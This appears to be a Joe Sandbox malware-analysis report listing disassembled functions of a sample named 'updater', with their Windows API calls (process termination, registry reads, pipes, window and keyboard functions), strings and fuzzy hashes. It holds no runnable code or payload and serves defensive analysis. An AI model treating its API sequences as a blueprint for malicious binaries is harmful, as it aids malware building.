Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 138a10f35338e86402b1fac73557b2cbd903e78922949b213549eb3df6a22e91
Instruction ID: 0117c63c6a140973d5cb7bcc550de13870226bc7a6339581da31679072d36923
Opcode Fuzzy Hash: 138a10f35338e86402b1fac73557b2cbd903e78922949b213549eb3df6a22e91
Instruction Fuzzy Hash: AC018475E00208BBEF159BA59C49A5EBFBCEB49311F008065FA08AB290D6349C10CFA0

Function 0039C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 003116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311738
Part of subcall function 003116CF: BeginPath.GDI32(?), ref: 0031174F
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0039C57C
LineTo.GDI32(00000000,00000003,?), ref: 0039C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0039C59E
LineTo.GDI32(00000000,00000000,?), ref: 0039C5AE
EndPath.GDI32(00000000), ref: 0039C5BE
StrokePath.GDI32(00000000), ref: 0039C5CE

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 01117d81b6bc5b7de44e1800d65805a65e5e1ea495591b9859e0723a9d209382
Instruction ID: 3ec4f26f9987c066656ec1b6cdeb2204f999f9aa2e88221b10738c5d07bc8bf0
Opcode Fuzzy Hash: 01117d81b6bc5b7de44e1800d65805a65e5e1ea495591b9859e0723a9d209382
Instruction Fuzzy Hash: B111DB7600010DBFDF139F91DC88FEA7FADEB09354F058052BA195A160D771AE55DBA0

Function 003307BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 003307EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 003307F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 003307FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0033080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00330812
MapVirtualKeyW.USER32(00000012,00000000), ref: 0033081A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: cf89365d8b0e76d9c7fa839002179778ff65c669047fd2fe23a5e34ea88ab6c2
Instruction ID: 8e881fc438169c48b88a6cbd457bcfc02ce97e4c0e1ffab2f3a3ed055c065dae
Opcode Fuzzy Hash: cf89365d8b0e76d9c7fa839002179778ff65c669047fd2fe23a5e34ea88ab6c2
Instruction Fuzzy Hash: 11016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 003759A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003759B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003759CA
GetWindowThreadProcessId.USER32(?,?), ref: 003759D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003759F9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: e10005de71018bbd6cb2788cd5be5d5bc96de979e03be328c77b6c6c3c5196ad
Instruction ID: 6734f42a2740c228310b8a14fa1c96995f092dd7f7d4194d42cf82ba69d228c5
Opcode Fuzzy Hash: e10005de71018bbd6cb2788cd5be5d5bc96de979e03be328c77b6c6c3c5196ad
Instruction Fuzzy Hash: 6DF03036241158BFE7265B929C0DEEF7B7CEFC7B15F000159FA05D1060E7A41A1286B5

Function 016D4DAA Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 016D21F1: GetKeyboardType.USER32(00000000), ref: 016D21F6
Part of subcall function 016D21F1: GetKeyboardType.USER32(00000001), ref: 016D2202

GetCommandLineA.KERNEL32 ref: 016D4E10
GetVersion.KERNEL32 ref: 016D4E24
GetVersion.KERNEL32 ref: 016D4E35
GetCurrentThreadId.KERNEL32 ref: 016D4E71

Part of subcall function 016D2221: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D2243
Part of subcall function 016D2221: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,016D2292,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D2276
Part of subcall function 016D2221: RegCloseKey.ADVAPI32(?,016D2299,00000000,?,00000004,00000000,016D2292,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D228C

GetThreadLocale.KERNEL32 ref: 016D4E51

Part of subcall function 016D4CE1: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,016D4D47), ref: 016D4D07

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: 7e01dd1a1f0a5d9ee814dd5af518c878473033cf9849c53a85899b8df1db90e4
Instruction ID: 2363fb2d740eb00d4ef094a81d502c6dff201ece416486bdb737d6488c86d667
Opcode Fuzzy Hash: 7e01dd1a1f0a5d9ee814dd5af518c878473033cf9849c53a85899b8df1db90e4
Instruction Fuzzy Hash: 87012DB4C483429EE320FFF8AC093193AD2AF61206F04665DD5549F749EF768524C76B

Function 003777EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 003777FE
EnterCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 0037780F
TerminateThread.KERNEL32(00000000,000001F6,?,0031C2B6,?,?), ref: 0037781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,0031C2B6,?,?), ref: 00377829

Part of subcall function 003771F0: CloseHandle.KERNEL32(00000000,?,00377836,?,0031C2B6,?,?), ref: 003771FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 0037783C
LeaveCriticalSection.KERNEL32(?,?,0031C2B6,?,?), ref: 00377843

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 59078ba4a991e43dc665bbccd0caa91088fe31052032b2d31e8c7bc540291239
Instruction ID: 7cf533d84401b605d1666eef8998cde7ae8733380b74449389deee792a709d76
Opcode Fuzzy Hash: 59078ba4a991e43dc665bbccd0caa91088fe31052032b2d31e8c7bc540291239
Instruction Fuzzy Hash: 33F05E36145312ABD7272B64EC8DAEF773DFF46302F154821F102950A1CBB95801CB61

Function 0036954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00369555
UnloadUserProfile.USERENV(?,?), ref: 00369561
CloseHandle.KERNEL32(?), ref: 0036956A
CloseHandle.KERNEL32(?), ref: 00369572
GetProcessHeap.KERNEL32(00000000,?), ref: 0036957B
HeapFree.KERNEL32(00000000), ref: 00369582

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fdb0b7ef5eb672980e40c4fecaba9ea31d0cd235ea3f0c45c4af92b190e17cf3
Instruction ID: dcade1dae0e5117c187450c8b3125d832f85bc7e7442186de3a314003ad0caae
Opcode Fuzzy Hash: fdb0b7ef5eb672980e40c4fecaba9ea31d0cd235ea3f0c45c4af92b190e17cf3
Instruction Fuzzy Hash: 0EE0C23A104101BFDA061BE1EC0C99ABB2DFB4A722F104220F215810B0CB72A461DF50

Function 00388CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00388CFD
CharUpperBuffW.USER32(?,?), ref: 00388E0C
VariantClear.OLEAUT32(?), ref: 00388F84

Part of subcall function 00377B1D: VariantInit.OLEAUT32(00000000), ref: 00377B5D
Part of subcall function 00377B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00377B66
Part of subcall function 00377B1D: VariantClear.OLEAUT32(00000000), ref: 00377B72

Strings

AUTOIT.ERROR, xrefs: 00388E12
Incorrect Parameter format, xrefs: 00388D35, 00388EF7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 027eb42b2b0aab9c9467f3c0418e38e67e78cb8b9ee584e8c1f832c251a27013
Instruction ID: eec7bf6b86a2c5ea2f9e8f329697f314774a7e2b7a2440a524745ab7a7ce7ca2
Opcode Fuzzy Hash: 027eb42b2b0aab9c9467f3c0418e38e67e78cb8b9ee584e8c1f832c251a27013
Instruction Fuzzy Hash: 9F919F746083019FC715EF24C48095ABBF5EF99314F14895EF88A8B362DB31ED45CB51

Function 0037323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

_memset.LIBCMT ref: 0037332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0037335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00373410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0037343E

Strings

0, xrefs: 0037331A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: da495b321ec3bbb893b1a95ea488a4558747d05dfa6e9d74276d87a54cb0be78
Instruction ID: 22ab645c1674dc1dabbd1b096dea789d78e0f1d35556efb387da1591491b3814
Opcode Fuzzy Hash: da495b321ec3bbb893b1a95ea488a4558747d05dfa6e9d74276d87a54cb0be78
Instruction Fuzzy Hash: 3B51CF316083019BD73BDE29D84566BBBE8AF45310F058A2EF899D72D1DB38CE44E752

Function 00372EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00372F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00372F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00372FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003D7890,00000000), ref: 00373012

Strings

0, xrefs: 00372F5C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 5f1461a9b5a77944eb70263b60fb55fa5a2443a13e61348ea62902b8b7583cb3
Instruction ID: df522c9c26936340b8e36cf8d248ab7dd1b8d5995425d98adbfef12d1661023b
Opcode Fuzzy Hash: 5f1461a9b5a77944eb70263b60fb55fa5a2443a13e61348ea62902b8b7583cb3
Instruction Fuzzy Hash: 7241C3312083419FD736DF24C884B5BBBE8BF89310F118A1DF46A9B291D774EA05CB52

Function 00396A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00312111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
Part of subcall function 00312111: GetStockObject.GDI32(00000011), ref: 00312163
Part of subcall function 00312111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00396A86
LoadLibraryW.KERNEL32(?), ref: 00396A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00396AA2
DestroyWindow.USER32(?), ref: 00396AAA

Strings

SysAnimate32, xrefs: 00396A61

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ad4e3edacacaa1da1f785381609e9170ab98406aeed17344c95d141ff6785a5a
Instruction ID: c4ae37a3f2f97ac5658ee5aa009770881dc9a6885c12f0b6643186682f239d5d
Opcode Fuzzy Hash: ad4e3edacacaa1da1f785381609e9170ab98406aeed17344c95d141ff6785a5a
Instruction Fuzzy Hash: 7321DEB1211206AFEF128F74DC82EBB37ACEF59364F118619FA10A6090D331CC50A760

Function 00377357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00377377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003773AA
GetStdHandle.KERNEL32(0000000C), ref: 003773BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003773F6

Strings

nul, xrefs: 003773F1

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d738d2be0a49d9c219ee4ebccd5f91b25dfe6e2bb501b2301cafa4707255ee69
Instruction ID: f3f040515f6279bba82c0e10f2598dad385656daa775a205b5f30723cafb0257
Opcode Fuzzy Hash: d738d2be0a49d9c219ee4ebccd5f91b25dfe6e2bb501b2301cafa4707255ee69
Instruction Fuzzy Hash: 4121A77450830A9BEB328F65DC05A9E77E8EF45720F218A19FCA4D72D0D774D850EBA0

Function 00377425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00377444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00377476
GetStdHandle.KERNEL32(000000F6), ref: 00377487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003774C1

Strings

nul, xrefs: 003774BC

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 597ee0d5eff3c09c380b19ff039bb7ced0894169fc0878df6398922069600147
Instruction ID: a80b4876ff86f7356fe65243c73f6db5b51021c2e0988e09f4c26f962928d2ce
Opcode Fuzzy Hash: 597ee0d5eff3c09c380b19ff039bb7ced0894169fc0878df6398922069600147
Instruction Fuzzy Hash: 1021C4316083059BDB319F6A8C49F997BA8AF45730F218B19F9A4D72D0DB749841CB50

Function 0037B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0037B297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0037B2EB
__swprintf.LIBCMT ref: 0037B304
SetErrorMode.KERNEL32(00000000,00000001,00000000,003A0980), ref: 0037B342

Strings

%lu, xrefs: 0037B2FE

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c434260e5894871f0aee40d3510aa8421434d0fe0a0dcae8728a6604c4cbdb67
Instruction ID: efb868e18e753955a902a5de3ec3d3c373cea78d85ee33fb7640e6932302371f
Opcode Fuzzy Hash: c434260e5894871f0aee40d3510aa8421434d0fe0a0dcae8728a6604c4cbdb67
Instruction Fuzzy Hash: AC217435600208AFCB15DF65C885EEEB7B8EF89704F108069F509DB352DB31EA45CB61

Function 0036AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0036AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0036AA6F
Part of subcall function 0036AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036AA82
Part of subcall function 0036AA52: GetCurrentThreadId.KERNEL32 ref: 0036AA89
Part of subcall function 0036AA52: AttachThreadInput.USER32(00000000), ref: 0036AA90

GetFocus.USER32 ref: 0036AC2A

Part of subcall function 0036AA9B: GetParent.USER32(?), ref: 0036AAA9

GetClassNameW.USER32(?,?,00000100), ref: 0036AC73
EnumChildWindows.USER32(?,0036ACEB), ref: 0036AC9B
__swprintf.LIBCMT ref: 0036ACB5

Strings

%s%d, xrefs: 0036ACAF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 30d52d5011271007c35ca4dadb9b53e4c25004c1e1f90f2fbc2c17a1ec489b32
Instruction ID: 40178eab4efe067e68bc50cbea2f745671f6553ab49e98ae3e351a24ffecbafd
Opcode Fuzzy Hash: 30d52d5011271007c35ca4dadb9b53e4c25004c1e1f90f2fbc2c17a1ec489b32
Instruction Fuzzy Hash: DC11CD74200204ABCF13BFA0DD85FEA776CAB45300F0080B9FA08AA146CA715945CF71

Function 016D2221 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D2243
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,016D2292,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D2276
RegCloseKey.ADVAPI32(?,016D2299,00000000,?,00000004,00000000,016D2292,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 016D228C

Strings

FPUMaskValue, xrefs: 016D226D
SOFTWARE\Borland\Delphi\RTL, xrefs: 016D2239

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 928d6b7c6100644f05da847ac294ff66207deb259bb8039232d393563f080030
Instruction ID: 455719fbf18f9a0c2e3b0601c07892c385b12bfa1057131f45317d9694d5e4f7
Opcode Fuzzy Hash: 928d6b7c6100644f05da847ac294ff66207deb259bb8039232d393563f080030
Instruction Fuzzy Hash: B3012479E5430CBAEB11DBE4DC12BA973BCEB08B00F108169BA04D7680E6B05A20C758

Function 003722E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00372318

Strings

KEYS, xrefs: 0037232F
EXISTS, xrefs: 00372340
REMOVE, xrefs: 0037231E
APPEND, xrefs: 00372351

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 16be595af307c0585abec383290f374cdecc3225340434a9da0009828c06f1cb
